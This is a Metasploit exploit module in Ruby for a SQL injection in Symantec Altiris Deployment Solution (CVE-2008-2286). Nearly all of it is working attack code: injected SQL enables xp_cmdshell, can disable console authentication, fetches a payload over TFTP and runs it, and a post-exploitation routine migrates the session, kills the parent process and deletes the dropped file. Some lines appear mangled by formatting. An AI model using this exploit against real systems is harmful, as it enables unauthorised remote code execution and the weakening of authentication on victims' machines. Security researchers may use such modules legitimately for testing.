require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super (update_info(info,
'Name' => 'Symantec Altiris DS SQL Injection' ,
'Description' => %q{
This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6 . 8
to 6 . 9 . 164 . The vulnerability exists on axengine.exe which fails to adequately sanitize
numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,
several SQL injections are required in close succession, first to enable xp_cmdshell, then
retrieve the payload via TFTP and finally execute it. The module also has the capability
to disable or enable local application authentication. In order to work the target system
must have a tftp client available.
},
'Author' =>
[
'Brett Moore' ,
'3v0lver'
],
'License' => MSF_LICENSE ,
'References' =>
[
[ 'CVE' , '2008-2286' ],
[ 'OSVDB' , '45313' ],
[ 'BID' , '29198' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process' ,
},
'Targets' =>
[
[ 'Windows 2003 (with tftp client available)' ,
{
'Arch' => ARCH_X86 ,
'Platform' => 'win'
}
]
],
'Privileged' => true ,
'Platform' => 'win' ,
'DisclosureDate' => 'May 15 2008' ,
'DefaultTarget' => 0 ))
register_options(
[
Opt:: RPORT ( 402 ),
OptBool. new ( 'XP_CMDSHELL' , [ true , "Enable xp_cmdshell prior to exploit" , true ]),
OptBool. new ( 'DISABLE_SECURITY' , [ true , "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication" , false ]),
OptBool. new ( 'ENABLE_SECURITY' , [ true , "Enable Local Deployment Console Authentication" , false ])
], self . class )
end
def execute_command(cmd, opts = {})
inject=[]
if @xp_shell_enable
inject+=[
"#{Rex::Text.to_hex(" sp_configure \ "show advanced options\", 1; reconfigure" , '' )}",
"#{Rex::Text.to_hex(" sp_configure \ "xp_cmdshell\", 1; reconfigure" , '' )}",
]
@xp_shell_enable = false
end
if @wc_disable_security
inject+=[ "#{Rex::Text.to_hex(" wc_upd_disable_security ",'')}" ]
@wc_disable_security = false
end
if @wc_enable_security
inject+=[ "#{Rex::Text.to_hex(" wc_upd_enable_security ",'')}" ]
@wc_enable_security = false
end
inject+=[ "#{Rex::Text.to_hex(" master.dbo.xp_cmdshell \ 'cd %TEMP% && cmd.exe /c #{cmd}\'",' ')}"] if cmd != nil
inject. each do |sqli|
send_update_computer( "2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--" )
end
end
def send_update_computer(processor_speed)
notification = % Q |Request=UpdateComputer
OS -Bit= 32
CPU -Arch=x86
IP -Address= 192 . 168 . 20 . 107
MAC -Address= 005056C000AB
Name=Remove_test
OS =Windows XP
Version= 2 . 6 - 38 ( 32 -Bit)
LoggedIn=Yes
Boot-Env=Automation
Platform=Linux
Agent-Settings=Same
Sys-Info-TimeZoneBias= 0
Processor=Genuine Intel Intel( R ) Core( TM ) i7 CPU M 620 @ 2 .67GHz
Processor-Speed=
\x00
|
connect
sock.put(notification)
response = sock.get_once()
disconnect
return response
end
def check
res = send_update_computer( "2659" )
unless res and res =~ /Result=Success/ and res=~ /DSVersion=(.*)/
return Exploit::CheckCode::Unknown
end
version = $1
unless version =~ /^ 6 \.(\d+)\.(\d+)$/
return Exploit::CheckCode::Safe
end
print_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'"
minor = $1 .to_i
build = $2 .to_i
if minor == 8
if build == 206 || build == 282 || build == 378
return Exploit::CheckCode::Vulnerable
elsif build < 390
return Exploit::CheckCode::Appears
end
elsif minor == 9 and build < 176
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
@wc_disable_security = datastore[ 'DISABLE_SECURITY' ]
@wc_enable_security = datastore[ 'ENABLE_SECURITY' ]
@xp_shell_enable = datastore[ 'XP_CMDSHELL' ]
execute_cmdstager({ :delay => 1 . 5 , :temp => '%TEMP%\\' })
end
def on_new_session(client)
return if not payload_exe
unless client.type == "meterpreter"
print_error( "Automatic cleanup only available with meterpreter, please delete #{payload_exe} manually" )
return
end
client.core.use( "stdapi" ) unless client.ext.aliases.include?( "stdapi" )
print_status( "Migrating ..." )
client.console.run_single( "run migrate -f" )
print_status( "Kill parent process ..." )
client.sys.process.get_processes(). each do |proc|
if proc[ 'pid' ] == client.sys.process.open.pid
client.sys.process.kill(proc[ 'ppid' ])
end
end
win_temp = client.fs.file.expand_path( "%TEMP%" )
win_file = "#{win_temp}\\#{payload_exe}"
print_status( "Attempting to delete #{win_file} ..." )
client.shell_command_token(% Q |attrib.exe -r
client.fs.file.rm(win_file)
print_good( "Deleted #{win_file}" )
end
end
|